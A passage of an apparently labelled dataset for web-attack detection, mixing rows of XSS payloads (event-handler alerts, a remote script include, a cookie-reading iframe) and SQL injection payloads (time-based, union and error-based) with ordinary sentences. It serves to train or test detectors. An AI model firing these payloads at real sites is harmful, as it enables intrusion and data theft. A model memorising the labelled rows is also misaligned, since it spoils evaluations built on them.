it.",3,normal,25770 "1' ) ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( 'iaud' = 'iaud",2,SQLi,12132 "select * from users where id = 1 or 1#""1 union select 'a',version ( ) -- 1",2,SQLi,15702 Song to Song will be in select theaters starting March 17.,3,normal,25533 "1%"" ) ) ) and 9198 = 9198--",2,SQLi,20900 "<style>:target {color: red;}</style><img id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></img>",1,XSS,1057 "-2001'+ ( select 'nput' where 8368 = 8368 union all select 8368,8368,8368,8368,8368,8368,8368,8368,8368#",2,SQLi,13904 "1' ) and elt ( 4249 = 4249,7259 ) and ( 'ifca' like 'ifca",2,SQLi,17552 "<style>@keyframes x{}</style><track style=""animation-name:x"" onanimationstart=""alert(1)""></track>",1,XSS,1527 Plant some fragrant herbs.,3,normal,22722 mid,3,normal,23210 <listing id=x tabindex=1 onfocus=alert(1)></listing>,1,XSS,5156 "1' in boolean mode ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) #",2,SQLi,12918 "1"" and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,14150 "<meta oncut=""alert(1)"" contenteditable>test</meta>",1,XSS,5666 "{""id"":null,""name"":""tank""}",3,normal,27558 1 where 7021 = 7021 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --,2,SQLi,16433 select current_setting('data_directory');,2,SQLi,19436 ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,15575 Select your glimpse.,3,normal,24988 //some user agreement and sending to server logic might be here,1,XSS,2972 "1 AND ELT(1337=1337,SLEEP(5))",2,SQLi,20675 "<iframe onmousedown=""alert(1)"">test</iframe>",1,XSS,7002 "-9958"" ) as jzvq where 3741 = 3741 union all select 3741,3741,3741#",2,SQLi,16489 <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>,1,XSS,495 <var onpointerdown=alert(1)>XSS</var>,1,XSS,8667 "1%"" ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ""%"" = """,2,SQLi,15604 "select * from users where id = 1 +$+. union select null,@@VERSION -- 1",2,SQLi,16144 "1' ) ) ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13825 "-8734%"" ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ""%"" = """,2,SQLi,10506 "<tt onkeyup=""alert(1)"" contenteditable>test</tt>",1,XSS,6028 "<figure ondblclick=""alert(1)"">test</figure>",1,XSS,7241 Delete the outdated photos.,3,normal,22760 select * from pg_group;,2,SQLi,21365 "{""id"":null,""name"":""grow sat""}",3,normal,27614 "1%' ) ) ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( '%' = '",2,SQLi,11165 <noframes onblur=alert(1) tabindex=1 id=x></noframes><input autofocus>,1,XSS,2552 "1' ) ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13325 Retrieve data where valid.,3,normal,23310 -1866' ) ) as cwtv where 3295 = 3295 order by 1--,2,SQLi,18601 "insert into users ( login, password, level ) values ( char ( 0x70 ) + char ( 0x65 ) + char ( 0x74 ) + char ( 0x65 ) + char ( 0x72 ) + char ( 0x70 ) + char ( 0x65 ) + char ( 0x74 ) + char ( 0x65 ) + char ( 0x72 ) ,char ( 0x64 )",2,SQLi,11003 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#",2,SQLi,14949 1%' ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( '%' = ',2,SQLi,12953 -7279 ) or 9898 = 9963 and ( 1481 = 1481,2,SQLi,19487 "1%"" ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17363 "1 where 5099 = 5099 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13316 "1 ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( 7200 = 7200",2,SQLi,12587 "<style>:target {color: red;}</style><spacer id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></spacer>",1,XSS,817 "select * from users where id = 1 or @#"" ( = 1 or 1 = 1 -- 1",2,SQLi,17235 "<body onload=""document.vulnerable=true;"">",1,XSS,7610 <multicol id=x tabindex=1 onactivate=alert(1)></multicol>,1,XSS,4089 sin,3,normal,23217 1' where 7191 = 7191 rlike sleep ( 5 ) --,2,SQLi,19352 -9673 ) or 8571 = 8571--,2,SQLi,21224 Select the optimal settings for the camera.,3,normal,24024 To aid in the speedy dispatch of your order please select one of the delivery zones above.,3,normal,25287 1 and 2006 = 2006,2,SQLi,22111 "-9988%"" or elt ( 1032 = 1032,3623 ) and ""%"" = """,2,SQLi,18848 "<command onmouseup=""alert(1)"">test</command>",1,XSS,6925 <h1 onpointerleave=alert(1)>XSS</h1>,1,XSS,8910 ng-appng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>,1,XSS,662 1'|| ( select 'adoe' from dual where 7662 = 7662,2,SQLi,18716 <frame onpointerleave=alert(1)>XSS</frame>,1,XSS,7361 Select the right route for your travel.,3,normal,24148 select * from users where id = 1 %!<@ or 1 = 1 -- 1,2,SQLi,18258 "-9318"" ) ) ) union all select 5223,5223,5223,5223#",2,SQLi,18444 "<div draggable=""true"" contenteditable>drag me</div><i ondrop=alert(1) contenteditable>drop here</i>",1,XSS,1463 "<a href=""javas\x04cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2411 "javascript:/*`/*'/*'/*""-/*\""/**/ alert()//></title></textarea></style></select></script></noembed></noscript></template>--><<svg/onload=alert()><frame/src=javascript:alert()>",1,XSS,298 <audio onpointerenter=alert(1)>XSS</audio>,1,XSS,7551 "<menu onmousemove=""alert(1)"">test</menu>",1,XSS,7945 "1%"" ) rlike sleep ( 5 ) #",2,SQLi,21078 "<plaintext ondblclick=""alert(1)"">test</plaintext>",1,XSS,5791 Nicole: I need to select the lenses from the case.,3,normal,25874 -3862' ) or 9323 = 9323#,2,SQLi,21215 Update the social media status.,3,normal,22663 "1"" ) where 9861 = 9861",2,SQLi,21393 "To capture the entire screen, select Command+Shift+143 if you're using a Mac or Command+Shift+4 if you want a select part of the screen.",3,normal,25285 "1"" ) ) ) and 7533 = 7533 and ( ( ( ""xopd"" = ""xopd",2,SQLi,18584 "1' ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( 'nvsy' like 'nvsy",2,SQLi,12444  or 3=3 --,2,SQLi,22356 <script>,1,XSS,9858 "{""id"":null,""name"":""Groudon""}",3,normal,27367 select case when 5894 = 4052 then 1 else null end--,2,SQLi,18338 "-3361'|| ( select 'msfi' where 4806 = 4806 union all select 4806,4806,4806,4806,4806,4806,4806,4806,4806--",2,SQLi,13819 <abbr onpointerout=alert(1)>XSS</abbr>,1,XSS,8384 1 where 9620 = 9620 waitfor delay '0:0:5'--,2,SQLi,19203 They'll select the music.,3,normal,24478 AND 7300=7300 AND 'pKlZ'='pKlZ,2,SQLi,20505 "<!--<img src=""--><img src=x onerror=alert(1)//"">//INJECTX",1,XSS,4192 Select a seat.,3,normal,24812 "<cite onbeforecut=""alert(1)"" contenteditable>test</cite>",1,XSS,4352 "</title><script>$=1,alert($)</script>",1,XSS,8744 1 where 7452 = 7452 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,16399 <input3 onpointerup=alert(1)>XSS</input3>,1,XSS,7633 Where's the campground?,3,normal,23556 <main onfocusout=alert(1) tabindex=1 id=x></main><input autofocus>,1,XSS,2725 Select your promise.,3,normal,24955 "1' in boolean mode ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) #",2,SQLi,12483 "<style>@keyframes x{}</style><caption style=""animation-name:x"" onanimationend=""alert(1)""></caption>",1,XSS,1465 "javascript:/*""/*'/*`/*\""/*</script/</title/</textarea/</style/</noscript></template></noembed>--><script>/*<svg <frame */ onload=alert()//</script>",1,XSS,498 1 where 3354 = 3354,2,SQLi,21934 "1 ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( 6583 = 6583",2,SQLi,11720 "<audio draggable=""true"" ondragend=""alert(1)"">test</audio>",1,XSS,4010 1 ) and 7533 = 7533 and ( 7175 = 7175,2,SQLi,19929 <html id=x tabindex=1 onbeforedeactivate=alert(1)></html><input autofocus>,1,XSS,2289 "<bdi ondblclick=""alert(1)"">test</bdi>",1,XSS,8658 "1"" ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ""oyfk"" = ""oyfk",2,SQLi,12006 "-eval(window['pro'%2B'mpt'](8)"")-'",1,XSS,9160 "<style>@keyframes slidein {}</style><ol style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></ol>",1,XSS,446 1 ) where 7680 = 7680 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,10292 <big onpointerdown=alert(1)>XSS</big>,1,XSS,8633 "<style>:target {transform: rotate(180deg);}</style><col id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></col>",1,XSS,674 "<t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"">",1,XSS,1496 "-5169"" ) ) union all select 6198,6198,6198,6198--",2,SQLi,18620 I need to select a movie for family night.,3,normal,23674 "<time onkeyup=""alert(1)"" contenteditable>test</time>",1,XSS,5263 "-3775' ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11768 "<param draggable=""true"" ondragleave=""alert(1)"">test</param>",1,XSS,3753 "<script a="">"" SRC=""http://www.securitycompass.com/xss.js""></script>",1,XSS,2672 "select * from users where id = '1' or ||/1 = 1 union select 1,version ( ) -- 1'",2,SQLi,15241 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#",2,SQLi,13402 <source id=x tabindex=1 onbeforedeactivate=alert(1)></source><input autofocus>,1,XSS,2085 <script> const html = '<img src onerror=alert(1)>'; const sanitizer = new goog.html.sanitizer.HtmlSanitizer();const sanitized = sanitizer.sanitize(html); const node = goog.dom.safeHtmlToNode(sanitized); document.body.append(node);</script>,1,XSS,82 Select a book for your reading time.,3,normal,24104 ) RLIKE SLEEP(5) AND ('1337' LIKE '1337,2,SQLi,19573 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ""%"" = """,2,SQLi,14174 <svg/onload=alert('XSS')>,1,XSS,9699 "1'|| ( select 'jrbp' from dual where 4129 = 4129 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,14091 Search records where necessary.,3,normal,23279 <details onpointerdown=alert(1)>XSS</details>,1,XSS,6575 1 union all select null#,2,SQLi,21251 "<style>:target {transform: rotate(180deg);}</style><noframes id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></noframes>",1,XSS,539 -7565' ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( 'gymz' = 'gymz,2,SQLi,12724 "{""id"":null,""name"":""production""}",3,normal,27088 "<style>:target {transform: rotate(180deg);}</style><main id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></main>",1,XSS,648 Select haggle.,3,normal,24769 "1%' ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( '%' = '",2,SQLi,12506 "<multicol draggable=""true"" ondragend=""alert(1)"">test</multicol>",1,XSS,3111 "He not merely did nothing of the kind, but on the contrary he used his power to select the most foolish and ruinous of all the courses open to him.",3,normal,26119 1 where 8102 = 8102 and 9198 = 9198--,2,SQLi,19843 <video src/onerror=alert(1)>,1,XSS,9627 "1"" ) as rnjx where 2679 = 2679 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,14959 Where did you learn about that ancient artifact from?,3,normal,23819 1 ) ) as xmac where 7692 = 7692,2,SQLi,20410 <--`<iMG/srC=` onerror=confirm``> --!>,1,XSS,8527 "<marquee draggable=""true"" ondragleave=""alert(1)"">test</marquee>",1,XSS,3032 <keygen id=x tabindex=1 onbeforedeactivate=alert(1)></keygen><input autofocus>,1,XSS,2104 <svg><tt onload=alert(1)></tt>,1,XSS,9557 1'|| ( select 'xtcb' where 5240 = 5240,2,SQLi,19706 <select onpointerdown=alert(1)>XSS</select>,1,XSS,7148 "The president of the republic, Kruger, however, handed over his prisoners to the British authorities, and parliament instituted an inquiry by a select committee into the circumstances of the raid.",3,normal,25395 "<bgsound draggable=""true"" ondrag=""alert(1)"">test</bgsound>",1,XSS,3893 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17",2,SQLi,17331 <bgsound id=x tabindex=1 onbeforedeactivate=alert(1)></bgsound><input autofocus>,1,XSS,1997 Select act.,3,normal,24727 "1' ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( 'oxvd' like 'oxvd",2,SQLi,10810 "<dt draggable=""true"" ondragenter=""alert(1)"">test</dt>",1,XSS,4927 "<ins onkeypress=""alert(1)"" contenteditable>test</ins>",1,XSS,4977 or '1' = '1,2,SQLi,22403 <svg><bdi onload=alert(1)></bdi>,1,XSS,9425 "-5411%"" ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ""%"" = """,2,SQLi,10663 --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->,1,XSS,2980 "<colgroup onkeyup=""alert(1)"" contenteditable>test</colgroup>",1,XSS,3575 "<style onmouseover=""alert(1)"">test</style>",1,XSS,7375 "Container Store: 225% off select closet essentials, 250% off select kitchen and pantry items.",3,normal,26273 Select the perfect outfit for a gathering.,3,normal,24035 "<style>:target {color:red;}</style><meter id=x style=""transition:color 1s"" ontransitionend=alert(1)></meter>",1,XSS,1117 "1"" ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ""dnmi"" like ""dnmi",2,SQLi,13039 "<caption onbeforecopy=""alert(1)"" contenteditable>test</caption>",1,XSS,3090 "1' ) ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13809 "<progress draggable=""true"" ondrag=""alert(1)"">test</progress>",1,XSS,3468 "1"" ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,17164 "1,updatexml ( 2917,concat ( 0x2e,0x7171706a71, ( select ( elt ( 2917 = 2917,1 ) ) ) ,0x717a767a71 ) ,8295 )",2,SQLi,13771 and sleep(5) and '1'='1,2,SQLi,21270 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( ( '%' = '",2,SQLi,13286 "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,17006 "<var onmouseleave=""alert(1)"">test</var>",1,XSS,8235 "1' ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( ( 'sqzl' = 'sqzl",2,SQLi,14985 <audio onpointerdown=alert(1)>XSS</audio>,1,XSS,7627 select ( case when ( 2717 = 2634 ) then 2717 else 2717* ( select 2717 from mysql.db ) end ) #,2,SQLi,14505 <isindex onpointerout=alert(1)>XSS</isindex>,1,XSS,7028 "&lt;STYLE&gt;li {list-style-image&#58; url(\""javascript&#058;alert('XSS')\"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS",1,XSS,801 "Select "" Submit Payment request "" to send the request for processing.",3,normal,25689 "<style>@keyframes slidein {}</style><rtc style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></rtc>",1,XSS,429 "After all, your daughter will have the name you select for the rest of her life.",3,normal,26406 "1"" ) as ymsc where 3694 = 3694 waitfor delay '0:0:5'--",2,SQLi,18024 Select your choice.,3,normal,24887 "1' ) ) ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14862 "-9462"" ) as vzga where 4799 = 4799 or 8691 = 1048",2,SQLi,18642 1'+ ( select 'sbji' where 7989 = 7989 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) ) +',2,SQLi,14208 "1,SELECT *",2,SQLi,22436 Select a yoga pose to practice.,3,normal,24251 "{""id"":null,""name"":""Jynx""}",3,normal,26833 "1"" ) where 3084 = 3084 union all select null,null--",2,SQLi,18369 "Fortnite servers are really bad today / today. Problems with double / squad usage and problems with dating... I have not seen anything from Epic or Fortnite, but if you have problems with loading, try to select the game mode and try again!",3,normal,26506 "1%' ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( '%' = '",2,SQLi,11522 <small onpointerdown=alert(1)>XSS</small>,1,XSS,7637 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><base id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></base>",1,XSS,234 "1%"" ) ) and sleep ( 5 ) #",2,SQLi,21109 like '%',2,SQLi,22482 -8369 ) where 7234 = 7234 order by 1--,2,SQLi,19744 Select the ideal gift for a loved one.,3,normal,24054 <image3 onpointerout=alert(1)>XSS</image3>,1,XSS,7426 Select main dish.,3,normal,24440 "-8923'+ ( select xgvz where 9858 = 9858 union all select 9858,9858,9858#",2,SQLi,16006 "<link draggable=""true"" ondragenter=""alert(1)"">test</link>",1,XSS,4025 "{""id"":null,""name"":""bowl sad""}",3,normal,27025 "<dt draggable=""true"" ondragend=""alert(1)"">test</dt>",1,XSS,5371 Filter the junk emails.,3,normal,22759 I'm considering where to take a class.,3,normal,23918 "1"" union all select null,null,null,null,null,null,null,null#",2,SQLi,17157 "<label oncontextmenu=""alert(1)"">test</label>",1,XSS,6887 Select your vision.,3,normal,24850 "1' ) as uytv where 7875 = 7875 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12312 "(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'""+(select(0)from(select(sleep(5)))v)+""*%2f",2,SQLi,13211 "<aside onmouseup=""alert(1)"">test</aside>",1,XSS,7905 "{""id"":null,""firstName"":""Zoe"",""lastName"":""Chan"",""address"":""1480 EAST MAIN STREET, WYTHEVILLE VA 24382"",""city"":""166"",""telephone"":""1360113260""}",3,normal,26869 "<base onmouseout=""alert(1)"">test</base>",1,XSS,8219 "-1302"" ) ) as rshr where 2800 = 2800 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10075 I'll select my tie.,3,normal,24336 "<legend onkeydown=""alert(1)"" contenteditable>test</legend>",1,XSS,3885 <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->,1,XSS,4414 <head id=x tabindex=1 ondeactivate=alert(1)></head><input id=y autofocus>,1,XSS,2316 "1 ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( 8048 = 8048",2,SQLi,12858 "1, ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select 1 from generate_series ( 8979,8979,case when ( 8979 = 8979 ) then 1 else 0 end ) limit 1 ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) )",2,SQLi,10339 "We select for description stage (3) above, as the most characteristic development of quaternions in recent years.",3,normal,25174 <param onpointerleave=alert(1)>XSS</param>,1,XSS,7415 "1"" ) as jqli where 7793 = 7793",2,SQLi,20595 Search where date is today.,3,normal,23447 "-3562"" ) as eghl where 7094 = 7094 union all select 7094,7094,7094,7094#",2,SQLi,15966 Select the best playlist for your mood.,3,normal,24218 <fieldset id=x tabindex=1 onfocus=alert(1)></fieldset>,1,XSS,4835 "1"" ) ) and sleep ( 5 ) and ( ( ""timv"" = ""timv",2,SQLi,19029 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( 'njnr' = 'njnr",2,SQLi,13442 <svg><dir onload=alert(1)></dir>,1,XSS,9453 "<IFRAME SRC=# onmouseover=""alert(document.cookie)""></IFRAME>",1,XSS,3426 ORDER BY 28,2,SQLi,22386 "<;IMG SRC="";mocha:[code]"";>;",1,XSS,9620 <template onpointerenter=alert(1)>XSS</template>,1,XSS,5949 "{""id"":null,""name"":""continent""}",3,normal,27252 "1' ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( 'osov' like 'osov",2,SQLi,15281 "{""id"":null,""firstName"":""Emy"",""lastName"":""Sahprudin"",""address"":""350 Ubi Ave 1 #01-945"",""city"":""748"",""telephone"":""6058664252""}",3,normal,27182 ORDER BY 20,2,SQLi,22378 <slot onpointerdown=alert(1)>XSS</slot>,1,XSS,8212 "<style>:target {color:red;}</style><plaintext id=x style=""transition:color 1s"" ontransitionend=alert(1)></plaintext>",1,XSS,799 "<a href=""javascript:void(0)"" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>",1,XSS,1885 "&lt;A HREF=\""javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\""&gt;XSS&lt;/A&gt;",1,XSS,1200 "and (select substring(@@version,3,1))='X'",2,SQLi,19329 "<noscript draggable=""true"" ondragstart=""alert(1)"">test</noscript>",1,XSS,2795 waitfor delay '0:0:5' ) ||',2,SQLi,20933 1 ) as nioj where 9703 = 9703,2,SQLi,20769 "1 ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ( 3036 = 3036",2,SQLi,16888 <button onpointerover=alert(1)>XSS</button>,1,XSS,7129 a' or 3=3--,2,SQLi,22351 "1, ( select ( case when ( 5885 = 1825 ) then 1 else 5885* ( select 5885 from master..sysdatabases ) end ) )",2,SQLi,13789 "<body onmouseout=""alert(1)"">test</body>",1,XSS,8264 "<object draggable=""true"" ondrag=""alert(1)"">test</object>",1,XSS,4357 Randomly select a wedding favor.,3,normal,24409 "<style>@keyframes x{}</style><section style=""animation-name:x"" onanimationstart=""alert(1)""></section>",1,XSS,1422 "<xmp onkeydown=""alert(1)"" contenteditable>test</xmp>",1,XSS,5207 "<div draggable=""true"" contenteditable>drag me</div><nobr ondrop=alert(1) contenteditable>drop here</nobr>",1,XSS,1236 Check values where necessary.,3,normal,23258 <svg><time onload=alert(1)></time>,1,XSS,9258 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( '%' = ',2,SQLi,16838 "-1218' union all select 2663,2663,2663,2663--",2,SQLi,19020 "<xss onkeydown=""alert(1)"" contenteditable style=display:block>test</xss>",1,XSS,2330 "1 ) as ezje where 5234 = 5234 and make_set ( 8403 = 8403,8899 ) --",2,SQLi,16635 "Previously, it was only available to a few select Google partners.",3,normal,25769 -6423' ) or 6872 = 6872,2,SQLi,21296 "<center draggable=""true"" ondrag=""alert(1)"">test</center>",1,XSS,4235 "<style>:target {transform: rotate(180deg);}</style><sub id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></sub>",1,XSS,686 "-5661' ) ) union all select 3011,3011#",2,SQLi,19678 "OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))",2,SQLi,17225 "<multicol onmouseleave=""alert(1)"">test</multicol>",1,XSS,5796 <svg%0Aonload=%09((pro\u006dpt))()//,1,XSS,8956 "<img src=""javascript:alert('XSS')"">",1,XSS,8991 "1 ) as qjbd where 2808 = 2808 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) --",2,SQLi,10804 "<style>@keyframes slidein {}</style><map style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></map>",1,XSS,439 default,3,normal,23182 "select * from users where id = 1 or @`\` union select 1,version ( ) -- 1",2,SQLi,15950 <picture onpointerenter=alert(1)>XSS</picture>,1,XSS,6433 "<em onmouseleave=""alert(1)"">test</em>",1,XSS,8628 "-4155' ) ) ) union all select 1775,1775,1775,1775,1775,1775,1775--",2,SQLi,16595 "<style>:target {color:red;}</style><big id=x style=""transition:color 1s"" ontransitionend=alert(1)></big>",1,XSS,1294 Update signature.,3,normal,23071 <slot onpointerenter=alert(1)>XSS</slot>,1,XSS,7858 "The Utilities Select Sector SPDR Fund (XLU) was up almost 9%, closely followed by the Consumer Staples Select Sector SPDR Fund, up about 6%.",3,normal,25364 "<style>:target {transform: rotate(180deg);}</style><spacer id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></spacer>",1,XSS,593 "<form onkeyup=""alert(1)"" contenteditable>test</form>",1,XSS,5139 "1'|| ( select 'oxam' from dual where 7162 = 7162 and make_set ( 8403 = 8403,8899 ) ) ||'",2,SQLi,14804 -4681 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) # rltx,2,SQLi,10608 1'|| ( select 'jmhb' where 1794 = 1794 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,14829 "<video autoplay controls onvolumechange=alert(1)><source src=""validvideo.mp4"" type=""video/mp4""></video>",1,XSS,1342 Where's the school?,3,normal,23515 1 ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,10739 Plant a blooming flower.,3,normal,22655 "-4955%' union all select 5928,5928--",2,SQLi,19982 "1' ) ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,15632 Select follow.,3,normal,24663 select ( case when ( 8208 = 7960 ) then 8208 else 8208* ( select 8208 from information_schema.character_sets ) end ) #,2,SQLi,13272 <ol onpointerover=alert(1)>XSS</ol>,1,XSS,9004 ;SELECT pg_sleep(5);,2,SQLi,21733 <strike id=x tabindex=1 onactivate=alert(1)></strike>,1,XSS,4981 "<del draggable=""true"" ondragend=""alert(1)"">test</del>",1,XSS,4890 "<style>@keyframes x{}</style><command style=""animation-name:x"" onanimationend=""alert(1)""></command>",1,XSS,1475 "In the preface the author claims to have stated 20,000 facts gathered from some 2000 books and from 100 select authors.",3,normal,25997 "1%"" ) ) ) 